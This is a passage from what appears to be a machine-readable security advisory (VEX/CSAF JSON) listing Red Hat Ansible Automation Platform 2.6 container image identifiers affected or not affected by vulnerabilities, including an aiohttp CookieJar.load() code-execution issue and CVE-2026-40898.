"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "aiohttp: AIOHTTP: Arbitrary code execution via untrusted input to CookieJar.load()"
},
{
"cve": "CVE-2026-40898",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-04T19:00:56.584166+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
